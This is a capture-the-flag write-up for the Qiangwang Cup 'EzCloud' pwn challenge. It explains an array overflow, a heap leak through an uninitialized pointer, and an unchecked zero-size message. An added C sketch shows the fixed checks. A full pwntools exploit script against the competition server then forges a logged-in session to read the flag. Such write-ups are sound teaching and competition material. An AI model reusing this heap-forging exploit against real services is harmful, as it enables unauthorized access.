The 北极星 (Polaris) team, competing on behalf of 星盟安全团队 (Xingmeng Security Team), took first blood on this pwn challenge.
EzCloud
The notepad feature has an array overflow: the pointer stored at the 17th slot can be overwritten.
This lets us overwrite the LoginMsg pointer, and with a carefully arranged heap layout a fake login record can be forged.
Forging a LoginMsg whose isLogined field is 1 unlocks the restricted features, and the flag can then be read through /flag.
In addition, getMsg may leave the struct uninitialized; when a1->msgs2.buf is NULL, the dangling pointer can be used to leak a heap address.
During parse, v9 is never checked against 0, so a Msg of size 0 can be obtained.
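As an added illustration (not code from the challenge binary or from the write-up), the C sketch below shows a notepad with the three checks the bugs above lack: a bounds check before the table write, rejection of size-0 notes, and zero-initialized slots so a deleted or never-filled note cannot leave a dangling pointer for show() to dereference. The struct layout, the names (`Notepad`, `notepad_add`, `MAX_NOTES`) and the placement of the `login` pointer directly after the note table are assumptions chosen to mirror the description, not recovered from the binary.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NOTES 16   /* slots 0..15; the "17th position" is index 16 */

/* Assumed layout for illustration only (not taken from the challenge binary):
 * the session pointer sits right after the note table, so an unchecked write
 * to notes[MAX_NOTES] would land on `login`, the bug class described above. */
struct LoginMsg {
    int isLogined;
    char id[32];
};

struct Note {
    char *buf;
    size_t size;
};

struct Notepad {
    struct Note notes[MAX_NOTES];
    size_t count;
    struct LoginMsg *login;
};

/* calloc() zeroes every slot, so no Note.buf is ever an uninitialized
 * pointer that show() could later follow. */
struct Notepad *notepad_new(struct LoginMsg *login)
{
    struct Notepad *np = calloc(1, sizeof *np);
    if (np == NULL)
        return NULL;
    np->login = login;
    return np;
}

/* Returns the new note's index, or -1 if the request is rejected.
 * Both checks run before anything is written into the table. */
int notepad_add(struct Notepad *np, const char *content, size_t len)
{
    if (len == 0)                 /* a size-0 note is not valid input */
        return -1;
    if (np->count >= MAX_NOTES)   /* bounds check: never touch notes[16] */
        return -1;
    char *buf = malloc(len);
    if (buf == NULL)
        return -1;
    memcpy(buf, content, len);
    np->notes[np->count].buf = buf;
    np->notes[np->count].size = len;
    return (int)np->count++;
}

/* Frees a note and clears its slot so the stale pointer is never reused. */
int notepad_delete(struct Notepad *np, size_t idx)
{
    if (idx >= np->count || np->notes[idx].buf == NULL)
        return -1;
    free(np->notes[idx].buf);
    np->notes[idx].buf = NULL;
    np->notes[idx].size = 0;
    return 0;
}

/* Prints live notes as <p>...</p> (out may be NULL) and returns how many
 * were printed; NULL slots are skipped instead of dereferenced. */
size_t notepad_show(const struct Notepad *np, FILE *out)
{
    size_t shown = 0;
    for (size_t i = 0; i < np->count; i++) {
        if (np->notes[i].buf == NULL)
            continue;
        if (out != NULL)
            fprintf(out, "<p>%.*s</p>\n", (int)np->notes[i].size, np->notes[i].buf);
        shown++;
    }
    return shown;
}

void notepad_free(struct Notepad *np)
{
    if (np == NULL)
        return;
    for (size_t i = 0; i < MAX_NOTES; i++)
        free(np->notes[i].buf);   /* free(NULL) is a no-op for empty slots */
    free(np);
}

/* Scenario from the write-up: fill 16 slots, then try a 17th. Returns 1 when
 * the 17th add is refused and the login record is untouched, else 0. */
int overflow_guard_holds(void)
{
    struct LoginMsg session = { 0, "a" };
    struct Notepad *np = notepad_new(&session);
    if (np == NULL)
        return 0;
    for (int i = 0; i < MAX_NOTES; i++)
        if (notepad_add(np, "aaaa", 4) != i)
            return 0;
    int rejected = notepad_add(np, "dddd", 4) == -1;
    int intact = (np->login == &session) && (session.isLogined == 0);
    notepad_free(np);
    return rejected && intact;
}

int main(void)
{
    printf("17th note rejected and login intact: %d\n", overflow_guard_holds());
    return 0;
}
```

The same pattern applies to the other two bugs: `notepad_add` refuses `len == 0` where the challenge's parse skipped the check on v9, and `notepad_new`/`notepad_delete` keep every unused slot NULL so there is no dangling buffer pointer for a later show to leak from.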
EXP
```python
#coding:utf8
# Python 2 / pwntools exploit script from the write-up
from pwn import *
#sh = process('./EzCloud')
sh = remote('47.94.234.66',37128)

def login(user):
    payload = 'POST /login\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += '\r\n\r\n'
    sh.send(payload)
    sh.recvuntil('Success!')

def logout(user):
    payload = 'POST /logout\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += '\r\n\r\n'
    sh.send(payload)
    sh.recvuntil('Success!')

def create_vm(name):
    payload = 'POST /createvm\r\n'
    payload += 'Login-ID: {}\r\n'.format(name)
    payload += '\r\n\r\n'
    sh.send(payload)

# new note with Content-Length 0 (parse never checks v9 == 0)
def add_size0(user):
    payload = 'POST /notepad\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += 'Note-Operation: new%20note\r\n'
    payload += 'Content-Length: {}\r\n'.format(0)
    payload += 'Content-Type: multipart/form-data\r\n'
    payload += '\r\n'
    sh.send(payload)
    sh.recvuntil('Notepad operation done')

def add(user,content):
    payload = 'POST /notepad\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += 'Note-Operation: new%20note\r\n'
    payload += 'Content-Length: {}\r\n'.format(len(content))
    payload += 'Content-Type: application/x-www-form-urlencoded\r\n'
    payload += '\r\n'
    payload += content + '\r\n'
    sh.send(payload)
    sh.recvuntil('Notepad operation done')

def delete(user,index):
    payload = 'POST /notepad\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += 'Note-Operation: delete%20note\r\n'
    payload += 'Note-ID: {}\r\n'.format(index)
    payload += '\r\n'
    sh.send(payload)
    sh.recvuntil('Notepad operation done')

def edit(user,index,content):
    payload = 'POST /notepad\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += 'Note-Operation: edit%20note\r\n'
    payload += 'Note-ID: {}\r\n'.format(index)
    payload += 'Content-Length: {}\r\n'.format(len(content))
    payload += 'Content-Type: application/x-www-form-urlencoded\r\n'
    payload += '\r\n'
    payload += content + '\r\n'
    sh.send(payload)
    sh.recvuntil('Notepad operation done')

def show(user):
    payload = 'GET /notepad\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += '\r\n'
    sh.send(payload)

def get_flag(user):
    payload = 'GET /flag\r\n'
    payload += 'Login-ID: {}\r\n'.format(user)
    payload += '\r\n'
    sh.send(payload)

login('a')
add('a','a'*0x10)
delete('a',0)
#raw_input()
add('a','a'*0x10)
add('a','b'*0x10)
for i in range(5):
    add_size0('a')
add('a','a'*0x18)
# leak a heap address through the uninitialized msgs2.buf
show('a')
sh.recvuntil('b'*0x10)
sh.recvuntil('<p>')
heap_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(8):
    add('a','c'*0x10)
# array overflow: overwrite the next pointer
add('a','d'*0x10)
logout('a')
raw_input()
# forge a LoginMsg with isLogined = 1 at the computed heap address
fakeLoginMsg_addr = heap_addr + 0x2e80
payload = 'h\r\n\r\n'
payload += 'h'*0x6
payload += p64(1) + p64(fakeLoginMsg_addr + 0x20) + p64(0x1) + p64(0x1)
payload = payload.ljust(0x6b,'h')
payload += p64(fakeLoginMsg_addr)
payload = payload.ljust(0x120,'h')
get_flag(payload)
sh.interactive()
```
This article was first published on the WeChat public account 星盟安全 (Xingmeng Security): 强网杯 ezCloud题解 (Qiangwang Cup ezCloud write-up)